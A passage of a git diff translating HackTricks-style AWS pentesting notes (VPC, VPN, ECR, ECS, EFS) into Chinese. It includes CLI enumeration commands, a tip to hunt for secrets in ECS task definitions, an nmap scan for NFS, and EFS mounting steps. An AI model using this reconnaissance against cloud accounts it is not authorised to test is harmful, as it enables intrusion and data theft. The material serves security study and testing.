和 VPC 2 之间有一个对等连接,在 VPC 2 和 VPC 3 之间有另一个连接,如所示,则 VPC 1 和 VPC 2 可以直接相互通信,VPC 2 和 VPC 3 也可以相互通信,但 VPC 1 和 VPC 3 不能。**您不能通过一个 VPC 路由到另一个 VPC。** ### **VPC Flow Logs** -Within your VPC, you could potentially have hundreds or even thousands of resources all communicating between different subnets both public and private and also between different VPCs through VPC peering connections. **VPC Flow Logs allow you to capture IP traffic information that flows between your network interfaces of your resources within your VPC**. +在您的 VPC 中,您可能会有数百或甚至数千个资源在不同的公共和私有子网之间以及通过 VPC 对等连接在不同的 VPC 之间进行通信。**VPC Flow Logs 允许您捕获在 VPC 内资源的网络接口之间流动的 IP 流量信息**。 -Unlike S3 access logs and CloudFront access logs, the **log data generated by VPC Flow Logs is not stored in S3. Instead, the log data captured is sent to CloudWatch logs**. 
+与 S3 访问日志和 CloudFront 访问日志不同,**VPC Flow Logs 生成的日志数据不会存储在 S3 中。相反,捕获的日志数据会发送到 CloudWatch 日志**。 -Limitations: +限制: -- If you are running a VPC peered connection, then you'll only be able to see flow logs of peered VPCs that are within the same account. -- If you are still running resources within the EC2-Classic environment, then unfortunately you are not able to retrieve information from their interfaces -- Once a VPC Flow Log has been created, it cannot be changed. To alter the VPC Flow Log configuration, you need to delete it and then recreate a new one. -- The following traffic is not monitored and captured by the logs. DHCP traffic within the VPC, traffic from instances destined for the Amazon DNS Server. -- Any traffic destined to the IP address for the VPC default router and traffic to and from the following addresses, 169.254.169.254 which is used for gathering instance metadata, and 169.254.169.123 which is used for the Amazon Time Sync Service. -- Traffic relating to an Amazon Windows activation license from a Windows instance -- Traffic between a network load balancer interface and an endpoint network interface +- 如果您正在运行 VPC 对等连接,则您只能查看同一账户内对等 VPC 的流量日志。 +- 如果您仍在 EC2-Classic 环境中运行资源,那么不幸的是,您无法从它们的接口检索信息。 +- 一旦创建了 VPC Flow Log,就无法更改。要更改 VPC Flow Log 配置,您需要删除它,然后重新创建一个新的。 +- 以下流量不受日志监控和捕获。VPC 内的 DHCP 流量,目标为亚马逊 DNS 服务器的实例流量。 +- 任何目标为 VPC 默认路由器的 IP 地址的流量,以及与以下地址之间的流量,169.254.169.254 用于收集实例元数据,169.254.169.123 用于亚马逊时间同步服务。 +- 与 Windows 实例的亚马逊 Windows 激活许可证相关的流量。 +- 网络负载均衡器接口与端点网络接口之间的流量。 -For every network interface that publishes data to the CloudWatch log group, it will use a different log stream. And within each of these streams, there will be the flow log event data that shows the content of the log entries. Each of these **logs captures data during a window of approximately 10 to 15 minutes**. +对于每个向 CloudWatch 日志组发布数据的网络接口,它将使用不同的日志流。在每个这些流中,将有流日志事件数据,显示日志条目的内容。每个这些 **日志在大约 10 到 15 分钟的窗口期间捕获数据**。 ## VPN ### Basic AWS VPN Components -1. **Customer Gateway**: - - A Customer Gateway is a resource that you create in AWS to represent your side of a VPN connection. - - It is essentially a physical device or software application on your side of the Site-to-Site VPN connection. - - You provide routing information and the public IP address of your network device (such as a router or a firewall) to AWS to create a Customer Gateway. - - It serves as a reference point for setting up the VPN connection and doesn't incur additional charges. -2. **Virtual Private Gateway**: - - A Virtual Private Gateway (VPG) is the VPN concentrator on the Amazon side of the Site-to-Site VPN connection. - - It is attached to your VPC and serves as the target for your VPN connection. - - VPG is the AWS side endpoint for the VPN connection. - - It handles the secure communication between your VPC and your on-premises network. -3. **Site-to-Site VPN Connection**: - - A Site-to-Site VPN connection connects your on-premises network to a VPC through a secure, IPsec VPN tunnel. - - This type of connection requires a Customer Gateway and a Virtual Private Gateway. - - It's used for secure, stable, and consistent communication between your data center or network and your AWS environment. - - Typically used for regular, long-term connections and is billed based on the amount of data transferred over the connection. -4. **Client VPN Endpoint**: - - A Client VPN endpoint is a resource that you create in AWS to enable and manage client VPN sessions. 
- - It is used for allowing individual devices (like laptops, smartphones, etc.) to securely connect to AWS resources or your on-premises network. - - It differs from Site-to-Site VPN in that it is designed for individual clients rather than connecting entire networks. - - With Client VPN, each client device uses a VPN client software to establish a secure connection. +1. **客户网关**: +- 客户网关是您在 AWS 中创建的资源,用于表示您一侧的 VPN 连接。 +- 它本质上是您一侧的站点到站点 VPN 连接上的物理设备或软件应用程序。 +- 您向 AWS 提供路由信息和网络设备的公共 IP 地址(如路由器或防火墙),以创建客户网关。 +- 它作为设置 VPN 连接的参考点,不会产生额外费用。 +2. **虚拟私有网关**: +- 虚拟私有网关(VPG)是站点到站点 VPN 连接的亚马逊侧的 VPN 集中器。 +- 它附加到您的 VPC,并作为您的 VPN 连接的目标。 +- VPG 是 VPN 连接的 AWS 侧端点。 +- 它处理您 VPC 与本地网络之间的安全通信。 +3. **站点到站点 VPN 连接**: +- 站点到站点 VPN 连接通过安全的 IPsec VPN 隧道将您的本地网络连接到 VPC。 +- 这种类型的连接需要客户网关和虚拟私有网关。 +- 它用于在您的数据中心或网络与您的 AWS 环境之间进行安全、稳定和一致的通信。 +- 通常用于常规、长期连接,并根据通过连接传输的数据量计费。 +4. **客户端 VPN 端点**: +- 客户端 VPN 端点是您在 AWS 中创建的资源,用于启用和管理客户端 VPN 会话。 +- 它用于允许单个设备(如笔记本电脑、智能手机等)安全连接到 AWS 资源或您的本地网络。 +- 它与站点到站点 VPN 的不同之处在于,它是为单个客户端设计的,而不是连接整个网络。 +- 使用客户端 VPN,每个客户端设备使用 VPN 客户端软件建立安全连接。 ### Site-to-Site VPN -**Connect your on premisses network with your VPC.** +**将您的本地网络与您的 VPC 连接。** -- **VPN connection**: A secure connection between your on-premises equipment and your VPCs. -- **VPN tunnel**: An encrypted link where data can pass from the customer network to or from AWS. +- **VPN 连接**:您本地设备与您的 VPC 之间的安全连接。 +- **VPN 隧道**:一个加密链接,数据可以从客户网络传输到 AWS 或从 AWS 传输到客户网络。 - Each VPN connection includes two VPN tunnels which you can simultaneously use for high availability. +每个 VPN 连接包括两个 VPN 隧道,您可以同时使用它们以实现高可用性。 -- **Customer gateway**: An AWS resource which provides information to AWS about your customer gateway device. -- **Customer gateway device**: A physical device or software application on your side of the Site-to-Site VPN connection. -- **Virtual private gateway**: The VPN concentrator on the Amazon side of the Site-to-Site VPN connection. You use a virtual private gateway or a transit gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. -- **Transit gateway**: A transit hub that can be used to interconnect your VPCs and on-premises networks. You use a transit gateway or virtual private gateway as the gateway for the Amazon side of the Site-to-Site VPN connection. +- **客户网关**:一个 AWS 资源,向 AWS 提供有关您的客户网关设备的信息。 +- **客户网关设备**:您一侧的站点到站点 VPN 连接上的物理设备或软件应用程序。 +- **虚拟私有网关**:站点到站点 VPN 连接的亚马逊侧的 VPN 集中器。您使用虚拟私有网关或传输网关作为站点到站点 VPN 连接的亚马逊侧网关。 +- **传输网关**:一个传输中心,可用于互连您的 VPC 和本地网络。您使用传输网关或虚拟私有网关作为站点到站点 VPN 连接的亚马逊侧网关。 #### Limitations -- IPv6 traffic is not supported for VPN connections on a virtual private gateway. -- An AWS VPN connection does not support Path MTU Discovery. +- 虚拟私有网关不支持 VPN 连接的 IPv6 流量。 +- AWS VPN 连接不支持路径 MTU 发现。 -In addition, take the following into consideration when you use Site-to-Site VPN. +此外,在使用站点到站点 VPN 时,请考虑以下事项。 -- When connecting your VPCs to a common on-premises network, we recommend that you use non-overlapping CIDR blocks for your networks. +- 当将您的 VPC 连接到公共本地网络时,我们建议您为您的网络使用不重叠的 CIDR 块。 ### Client VPN -**Connect from your machine to your VPC** +**从您的机器连接到您的 VPC** #### Concepts -- **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -- **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. 
You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. -- **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -- **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. -- **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. -- **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. -- **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. -- **Client VPN network interfaces:** When you associate a subnet with your Client VPN endpoint, we create Client VPN network interfaces in that subnet. **Traffic that's sent to the VPC from the Client VPN endpoint is sent through a Client VPN network interface**. Source network address translation (SNAT) is then applied, where the source IP address from the client CIDR range is translated to the Client VPN network interface IP address. -- **Connection logging:** You can enable connection logging for your Client VPN endpoint to log connection events. You can use this information to run forensics, analyze how your Client VPN endpoint is being used, or debug connection issues. -- **Self-service portal:** You can enable a self-service portal for your Client VPN endpoint. Clients can log into the web-based portal using their credentials and download the latest version of the Client VPN endpoint configuration file, or the latest version of the AWS provided client. 
+- **客户端 VPN 端点**:您创建和配置的资源,以启用和管理客户端 VPN 会话。它是所有客户端 VPN 会话终止的资源。 +- **目标网络**:目标网络是您与客户端 VPN 端点关联的网络。**VPC 的一个子网是目标网络**。将子网与客户端 VPN 端点关联使您能够建立 VPN 会话。您可以将多个子网与客户端 VPN 端点关联以实现高可用性。所有子网必须来自同一 VPC。每个子网必须属于不同的可用区。 +- **路由**:每个客户端 VPN 端点都有一个路由表,描述可用的目标网络路由。路由表中的每个路由指定特定资源或网络的流量路径。 +- **授权规则**:授权规则 **限制可以访问网络的用户**。对于指定的网络,您配置允许访问的活动目录或身份提供者(IdP)组。只有属于该组的用户才能访问指定的网络。**默认情况下,没有授权规则**,您必须配置授权规则以使用户能够访问资源和网络。 +- **客户端**:连接到客户端 VPN 端点以建立 VPN 会话的最终用户。最终用户需要下载 OpenVPN 客户端,并使用您创建的客户端 VPN 配置文件建立 VPN 会话。 +- **客户端 CIDR 范围**:用于分配客户端 IP 地址的 IP 地址范围。每个连接到客户端 VPN 端点的连接都从客户端 CIDR 范围中分配一个唯一的 IP 地址。您选择客户端 CIDR 范围,例如 `10.2.0.0/16`。 +- **客户端 VPN 端口**:AWS 客户端 VPN 支持端口 443 和 1194 的 TCP 和 UDP。默认是端口 443。 +- **客户端 VPN 网络接口**:当您将子网与客户端 VPN 端点关联时,我们会在该子网中创建客户端 VPN 网络接口。**从客户端 VPN 端点发送到 VPC 的流量通过客户端 VPN 网络接口发送**。然后应用源网络地址转换(SNAT),将客户端 CIDR 范围中的源 IP 地址转换为客户端 VPN 网络接口 IP 地址。 +- **连接日志**:您可以为客户端 VPN 端点启用连接日志以记录连接事件。您可以使用此信息进行取证,分析客户端 VPN 端点的使用情况或调试连接问题。 +- **自助服务门户**:您可以为客户端 VPN 端点启用自助服务门户。客户端可以使用其凭据登录基于 Web 的门户,并下载客户端 VPN 端点配置文件的最新版本,或 AWS 提供的客户端的最新版本。 #### Limitations -- **Client CIDR ranges cannot overlap with the local CIDR** of the VPC in which the associated subnet is located, or any routes manually added to the Client VPN endpoint's route table. -- Client CIDR ranges must have a block size of at **least /22** and must **not be greater than /12.** -- A **portion of the addresses** in the client CIDR range are used to **support the availability** model of the Client VPN endpoint, and cannot be assigned to clients. Therefore, we recommend that you **assign a CIDR block that contains twice the number of IP addresses that are required** to enable the maximum number of concurrent connections that you plan to support on the Client VPN endpoint. -- The **client CIDR range cannot be changed** after you create the Client VPN endpoint. -- The **subnets** associated with a Client VPN endpoint **must be in the same VPC**. -- You **cannot associate multiple subnets from the same Availability Zone with a Client VPN endpoint**. -- A Client VPN endpoint **does not support subnet associations in a dedicated tenancy VPC**. -- Client VPN supports **IPv4** traffic only. -- Client VPN is **not** Federal Information Processing Standards (**FIPS**) **compliant**. -- If multi-factor authentication (MFA) is disabled for your Active Directory, a user password cannot be in the following format. +- **客户端 CIDR 范围不能与关联子网所在 VPC 的本地 CIDR 重叠**,或与手动添加到客户端 VPN 端点路由表的任何路由重叠。 +- 客户端 CIDR 范围的块大小必须至少为 **/22**,且 **不得大于 /12**。 +- 客户端 CIDR 范围中的 **一部分地址** 用于 **支持客户端 VPN 端点的可用性** 模型,不能分配给客户端。因此,我们建议您 **分配一个包含所需的最大并发连接数的两倍 IP 地址的 CIDR 块**,以支持您计划在客户端 VPN 端点上支持的最大并发连接数。 +- 创建客户端 VPN 端点后,**客户端 CIDR 范围无法更改**。 +- 与客户端 VPN 端点关联的 **子网必须在同一 VPC 中**。 +- 您 **不能将来自同一可用区的多个子网与客户端 VPN 端点关联**。 +- 客户端 VPN 端点 **不支持专用租用 VPC 中的子网关联**。 +- 客户端 VPN 仅支持 **IPv4** 流量。 +- 客户端 VPN **不** 符合联邦信息处理标准(**FIPS**)的 **合规性**。 +- 如果您的活动目录禁用了多因素身份验证(MFA),则用户密码不能采用以下格式。 - ``` - SCRV1:: - ``` +``` +SCRV1:: +``` -- The self-service portal is **not available for clients that authenticate using mutual authentication**. 
+- 自助服务门户 **不适用于使用互认证进行身份验证的客户端**。 {{#include ../../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md index 9025829b4..f8568e5b5 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecr-enum.md @@ -6,49 +6,48 @@ ### ECR -#### Basic Information +#### 基本信息 -Amazon **Elastic Container Registry** (Amazon ECR) is a **managed container image registry service**. It is designed to provide an environment where customers can interact with their container images using well-known interfaces. Specifically, the use of the Docker CLI or any preferred client is supported, enabling activities such as pushing, pulling, and managing container images. +Amazon **Elastic Container Registry** (Amazon ECR) 是一个 **托管的容器镜像注册服务**。它旨在提供一个环境,客户可以使用众所周知的接口与他们的容器镜像进行交互。具体来说,支持使用 Docker CLI 或任何首选客户端,进行推送、拉取和管理容器镜像等活动。 -ECR is compose by 2 types of objects: **Registries** and **Repositories**. +ECR 由两种类型的对象组成:**注册表**和**仓库**。 -**Registries** +**注册表** -Every AWS account has 2 registries: **Private** & **Public**. +每个 AWS 账户有两个注册表:**私有**和**公共**。 -1. **Private Registries**: +1. **私有注册表**: -- **Private by default**: The container images stored in an Amazon ECR private registry are **only accessible to authorized users** within your AWS account or to those who have been granted permission. - - The URI of a **private repository** follows the format `.dkr.ecr..amazonaws.com/` -- **Access control**: You can **control access** to your private container images using **IAM policies**, and you can configure fine-grained permissions based on users or roles. -- **Integration with AWS services**: Amazon ECR private registries can be easily **integrated with other AWS services**, such as EKS, ECS... -- **Other private registry options**: - - The Tag immutability column lists its status, if tag immutability is enabled it will **prevent** image **pushes** with **pre-existing tags** from overwriting the images. - - The **Encryption type** column lists the encryption properties of the repository, it shows the default encryption types such as AES-256, or has **KMS** enabled encryptions. - - The **Pull through cache** column lists its status, if Pull through cache status is Active it will cache **repositories in an external public repository into your private repository**. - - Specific **IAM policies** can be configured to grant different **permissions**. - - The **scanning configuration** allows to scan for vulnerabilities in the images stored inside the repo. +- **默认私有**:存储在 Amazon ECR 私有注册表中的容器镜像 **仅对您 AWS 账户内的授权用户** 或已获得权限的用户可访问。 +- **私有仓库**的 URI 格式为 `.dkr.ecr..amazonaws.com/` +- **访问控制**:您可以使用 **IAM 策略**来 **控制对私有容器镜像的访问**,并可以根据用户或角色配置细粒度权限。 +- **与 AWS 服务的集成**:Amazon ECR 私有注册表可以轻松与其他 AWS 服务集成,如 EKS、ECS... +- **其他私有注册表选项**: +- 标签不可变性列显示其状态,如果启用标签不可变性,它将 **防止** 使用 **已存在标签** 的镜像 **推送** 覆盖镜像。 +- **加密类型**列列出仓库的加密属性,显示默认加密类型,如 AES-256,或启用 **KMS** 加密。 +- **拉取缓存**列显示其状态,如果拉取缓存状态为活动,它将把 **外部公共仓库中的仓库缓存到您的私有仓库**。 +- 可以配置特定的 **IAM 策略**以授予不同的 **权限**。 +- **扫描配置**允许扫描存储在仓库中的镜像中的漏洞。 -2. **Public Registries**: +2. **公共注册表**: -- **Public accessibility**: Container images stored in an ECR Public registry are **accessible to anyone on the internet without authentication.** - - The URI of a **public repository** is like `public.ecr.aws//`. Although the `` part can be changed by the admin to another string easier to remember. 
+- **公共可访问性**:存储在 ECR 公共注册表中的容器镜像 **对互联网的任何人可访问,无需身份验证**。 +- **公共仓库**的 URI 类似于 `public.ecr.aws//`。虽然 `` 部分可以由管理员更改为更易记的字符串。 -**Repositories** +**仓库** -These are the **images** that in the **private registry** or to the **public** one. +这些是 **私有注册表**或 **公共** 注册表中的 **镜像**。 > [!NOTE] -> Note that in order to upload an image to a repository, the **ECR repository need to have the same name as the image**. +> 请注意,为了将镜像上传到仓库,**ECR 仓库需要与镜像同名**。 -#### Registry & Repository Policies +#### 注册表和仓库策略 -**Registries & repositories** also have **policies that can be used to grant permissions to other principals/accounts**. For example, in the following repository policy image you can see how any user from the whole organization will be able to access the image: +**注册表和仓库** 也有 **可以用于授予其他主体/账户权限的策略**。例如,在以下仓库策略图像中,您可以看到整个组织中的任何用户都将能够访问该镜像:
-#### Enumeration - +#### 枚举 ```bash # Get repos aws ecr describe-repositories @@ -68,39 +67,34 @@ aws ecr-public describe-repositories aws ecr get-registry-policy aws ecr get-repository-policy --repository-name ``` - -#### Unauthenticated Enum +#### 未认证枚举 {{#ref}} ../aws-unauthenticated-enum-access/aws-ecr-unauthenticated-enum.md {{#endref}} -#### Privesc +#### 权限提升 -In the following page you can check how to **abuse ECR permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用 ECR 权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-ecr-privesc.md {{#endref}} -#### Post Exploitation +#### 利用后 {{#ref}} ../aws-post-exploitation/aws-ecr-post-exploitation.md {{#endref}} -#### Persistence +#### 持久性 {{#ref}} ../aws-persistence/aws-ecr-persistence.md {{#endref}} -## References +## 参考 - [https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html](https://docs.aws.amazon.com/AmazonECR/latest/APIReference/Welcome.html) {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md index cbbf596fe..1e47ff3b4 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-ecs-enum.md @@ -4,31 +4,30 @@ ## ECS -### Basic Information +### 基本信息 -Amazon **Elastic Container Services** or ECS provides a platform to **host containerized applications in the cloud**. ECS has two **deployment** methods, **EC2** instance type and a **serverless** option, **Fargate**. The service **makes running containers in the cloud very easy and pain free**. +亚马逊 **弹性容器服务**(ECS)提供了一个 **在云中托管容器化应用程序** 的平台。ECS 有两种 **部署** 方法,**EC2** 实例类型和 **无服务器** 选项 **Fargate**。该服务 **使在云中运行容器变得非常简单且无痛**。 -ECS operates using the following three building blocks: **Clusters**, **Services**, and **Task Definitions**. +ECS 使用以下三个构建块进行操作:**集群**、**服务** 和 **任务定义**。 -- **Clusters** are **groups of containers** that are running in the cloud. As previously mentioned, there are two launch types for containers, EC2 and Fargate. AWS defines the **EC2** launch type as allowing customers “to run \[their] containerized applications on a cluster of Amazon EC2 instances that \[they] **manage**”. **Fargate** is similar and is defined as “\[allowing] you to run your containerized applications **without the need to provision and manage** the backend infrastructure”. -- **Services** are created inside a cluster and responsible for **running the tasks**. Inside a service definition **you define the number of tasks to run, auto scaling, capacity provider (Fargate/EC2/External),** **networking** information such as VPC’s, subnets, and security groups. - - There **2 types of applications**: - - **Service**: A group of tasks handling a long-running computing work that can be stopped and restarted. For example, a web application. - - **Task**: A standalone task that runs and terminates. For example, a batch job. - - Among the service applications, there are **2 types of service schedulers**: - - [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): The replica scheduling strategy places and **maintains the desired number** of tasks across your cluster. If for some reason a task shut down, a new one is launched in the same or different node. 
- - [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html): Deploys exactly one task on each active container instance that has the needed requirements. There is no need to specify a desired number of tasks, a task placement strategy, or use Service Auto Scaling policies. -- **Task Definitions** are responsible for **defining what containers will run** and the various parameters that will be configured with the containers such as **port mappings** with the host, **env variables**, Docker **entrypoint**... - - Check **env variables for sensitive info**! +- **集群** 是 **在云中运行的容器组**。如前所述,容器有两种启动类型,EC2 和 Fargate。AWS 将 **EC2** 启动类型定义为允许客户“在他们 **管理** 的 Amazon EC2 实例集群上运行他们的容器化应用程序”。**Fargate** 类似,被定义为“\[允许\] 您运行您的容器化应用程序 **而无需配置和管理** 后端基础设施”。 +- **服务** 在集群内创建,负责 **运行任务**。在服务定义中 **您定义要运行的任务数量、自动扩展、容量提供者(Fargate/EC2/External)、** **网络** 信息,如 VPC、子网和安全组。 +- 有 **2 种类型的应用程序**: +- **服务**:处理可以停止和重新启动的长期计算工作的任务组。例如,一个 web 应用程序。 +- **任务**:独立运行并终止的任务。例如,一个批处理作业。 +- 在服务应用程序中,有 **2 种类型的服务调度器**: +- [**REPLICA**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html):副本调度策略在您的集群中放置并 **维护所需数量** 的任务。如果由于某种原因任务关闭,则在同一或不同节点上启动一个新任务。 +- [**DAEMON**](https://docs.aws.amazon.com/AmazonECS/latest/developerguide/ecs_services.html):在每个具有所需要求的活动容器实例上部署一个任务。无需指定所需的任务数量、任务放置策略或使用服务自动扩展策略。 +- **任务定义** 负责 **定义将运行的容器** 以及与容器配置的各种参数,如 **与主机的端口映射**、**环境变量**、Docker **入口点**... +- 检查 **环境变量以获取敏感信息**! -### Sensitive Data In Task Definitions +### 任务定义中的敏感数据 -Task definitions are responsible for **configuring the actual containers that will be running in ECS**. Since task definitions define how containers will run, a plethora of information can be found within. +任务定义负责 **配置将在 ECS 中运行的实际容器**。由于任务定义定义了容器的运行方式,因此可以找到大量信息。 -Pacu can enumerate ECS (list-clusters, list-container-instances, list-services, list-task-definitions), it can also dump task definitions. - -### Enumeration +Pacu 可以枚举 ECS(list-clusters、list-container-instances、list-services、list-task-definitions),它还可以转储任务定义。 +### 枚举 ```bash # Clusters info aws ecs list-clusters @@ -52,35 +51,30 @@ aws ecs describe-tasks --cluster --tasks ## Look for env vars and secrets used from the task definition aws ecs describe-task-definition --task-definition : ``` - -### Unauthenticated Access +### 未经身份验证的访问 {{#ref}} ../aws-unauthenticated-enum-access/aws-ecs-unauthenticated-enum.md {{#endref}} -### Privesc +### 权限提升 -In the following page you can check how to **abuse ECS permissions to escalate privileges**: +在以下页面中,您可以查看如何**滥用ECS权限以提升权限**: {{#ref}} ../aws-privilege-escalation/aws-ecs-privesc.md {{#endref}} -### Post Exploitation +### 利用后 {{#ref}} ../aws-post-exploitation/aws-ecs-post-exploitation.md {{#endref}} -### Persistence +### 持久性 {{#ref}} ../aws-persistence/aws-ecs-persistence.md {{#endref}} {{#include ../../../banners/hacktricks-training.md}} - - - - diff --git a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md index bcf4e58d4..b890442d2 100644 --- a/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md +++ b/src/pentesting-cloud/aws-security/aws-services/aws-efs-enum.md @@ -4,22 +4,21 @@ ## EFS -### Basic Information +### 基本信息 -Amazon Elastic File System (EFS) is presented as a **fully managed, scalable, and elastic network file system** by AWS. The service facilitates the creation and configuration of **file systems** that can be concurrently accessed by multiple EC2 instances and other AWS services. 
The key features of EFS include its ability to automatically scale without manual intervention, provision low-latency access, support high-throughput workloads, guarantee data durability, and seamlessly integrate with various AWS security mechanisms. +Amazon Elastic File System (EFS) 被 AWS 视为一个 **完全托管、可扩展和弹性的网络文件系统**。该服务便于创建和配置 **文件系统**,这些文件系统可以被多个 EC2 实例和其他 AWS 服务同时访问。EFS 的主要特点包括能够在无需人工干预的情况下自动扩展,提供低延迟访问,支持高吞吐量工作负载,保证数据持久性,并与各种 AWS 安全机制无缝集成。 -By **default**, the EFS folder to mount will be **`/`** but it could have a **different name**. +默认情况下,EFS 挂载的文件夹将是 **`/`**,但它可以有 **不同的名称**。 -### Network Access +### 网络访问 -An EFS is created in a VPC and would be **by default accessible in all the VPC subnetworks**. However, the EFS will have a Security Group. In order to **give access to an EC2** (or any other AWS service) to mount the EFS, it’s needed to **allow in the EFS security group an inbound NFS** (2049 port) **rule from the EC2 Security Group**. +EFS 是在 VPC 中创建的,默认情况下可以 **在所有 VPC 子网中访问**。然而,EFS 将具有一个安全组。为了 **允许 EC2**(或任何其他 AWS 服务)挂载 EFS,需要 **在 EFS 安全组中允许来自 EC2 安全组的入站 NFS**(2049 端口)**规则**。 -Without this, you **won't be able to contact the NFS service**. +没有这个,您 **将无法联系 NFS 服务**。 -For more information about how to do this check: [https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) - -### Enumeration +有关如何做到这一点的更多信息,请查看:[https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount](https://stackoverflow.com/questions/38632222/aws-efs-connection-timeout-at-mount) +### 枚举 ```bash # Get filesystems and access policies (if any) aws efs describe-file-systems @@ -39,12 +38,10 @@ aws efs describe-replication-configurations # Search for NFS in EC2 networks sudo nmap -T4 -Pn -p 2049 --open 10.10.10.0/20 # or /16 to be sure ``` - > [!CAUTION] -> It might be that the EFS mount point is inside the same VPC but in a different subnet. If you want to be sure you find all **EFS points it would be better to scan the `/16` netmask**. +> EFS挂载点可能在同一个VPC内,但在不同的子网中。如果您想确保找到所有**EFS点,最好扫描`/16`子网掩码**。 ### Mount EFS - ```bash sudo mkdir /efs @@ -58,70 +55,63 @@ sudo yum install amazon-efs-utils # If centos sudo apt-get install amazon-efs-utils # If ubuntu sudo mount -t efs :/ /efs/ ``` +### IAM 访问 -### IAM Access - -By **default** anyone with **network access to the EFS** will be able to mount, **read and write it even as root user**. 
However, File System policies could be in place **only allowing principals with specific permissions** to access it.\ -For example, this File System policy **won't allow even to mount** the file system if you **don't have the IAM permission**: - +默认情况下,任何具有对 EFS 的网络访问的人都能够挂载、读取和写入它,即使是根用户。然而,文件系统策略可能会限制**仅允许具有特定权限的主体**访问它。\ +例如,如果您**没有 IAM 权限**,则此文件系统策略**甚至不允许挂载**文件系统: ```json { - "Version": "2012-10-17", - "Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", - "Statement": [ - { - "Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", - "Effect": "Allow", - "Principal": { - "AWS": "*" - }, - "Action": "", - "Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", - "Condition": { - "Bool": { - "elasticfilesystem:AccessedViaMountTarget": "true" - } - } - } - ] +"Version": "2012-10-17", +"Id": "efs-policy-wizard-2ca2ba76-5d83-40be-8557-8f6c19eaa797", +"Statement": [ +{ +"Sid": "efs-statement-e7f4b04c-ad75-4a7f-a316-4e5d12f0dbf5", +"Effect": "Allow", +"Principal": { +"AWS": "*" +}, +"Action": "", +"Resource": "arn:aws:elasticfilesystem:us-east-1:318142138553:file-system/fs-0ab66ad201b58a018", +"Condition": { +"Bool": { +"elasticfilesystem:AccessedViaMountTarget": "true" +} +} +} +] } ``` - -Or this will **prevent anonymous access**: +或者这将**防止匿名访问**:
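Before trying to mount, it can be worth checking whether the file system actually has such a policy attached. A minimal check with the CLI could look like this (the file system ID is just the one from the example policy above; a `PolicyNotFound` error means no policy is attached and only the network/security-group restrictions apply):

```bash
# Check if a file system policy is attached (no policy => anyone with network
# access can mount, read and write it, as described above)
aws efs describe-file-system-policy --file-system-id fs-0ab66ad201b58a018
# An error with code "PolicyNotFound" means the file system relies only on
# the security group / network restrictions
```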
-Note that to mount file systems protected by IAM you MUST use the type "efs" in the mount command: - +请注意,要挂载受 IAM 保护的文件系统,您必须在挂载命令中使用类型 "efs": ```bash sudo mkdir /efs sudo mount -t efs -o tls,iam :/ /efs/ # To use a different pforile from ~/.aws/credentials # You can use: -o tls,iam,awsprofile=namedprofile ``` - ### Access Points -**Access points** are **application**-specific entry points **into an EFS file system** that make it easier to manage application access to shared datasets. +**访问点**是**特定于应用程序**的入口点**进入EFS文件系统**,使管理应用程序对共享数据集的访问变得更容易。 -When you create an access point, you can **specify the owner and POSIX permissions** for the files and directories created through the access point. You can also **define a custom root directory** for the access point, either by specifying an existing directory or by creating a new one with the desired permissions. This allows you to **control access to your EFS file system on a per-application or per-user basis**, making it easier to manage and secure your shared file data. - -**You can mount the File System from an access point with something like:** +当您创建访问点时,您可以**指定通过访问点创建的文件和目录的所有者和POSIX权限**。您还可以**为访问点定义自定义根目录**,可以通过指定现有目录或创建一个具有所需权限的新目录来实现。这使您能够**按应用程序或用户控制对EFS文件系统的访问**,从而更容易管理和保护您的共享文件数据。 +**您可以通过访问点挂载文件系统,例如:** ```bash # Use IAM if you need to use iam permissions sudo mount -t efs -o tls,[iam],accesspoint= \ - /efs/ + /efs/ ``` - > [!WARNING] -> Note that even trying to mount an access point you still need to be able to **contact the NFS service via network**, and if the EFS has a file system **policy**, you need **enough IAM permissions** to mount it. +> 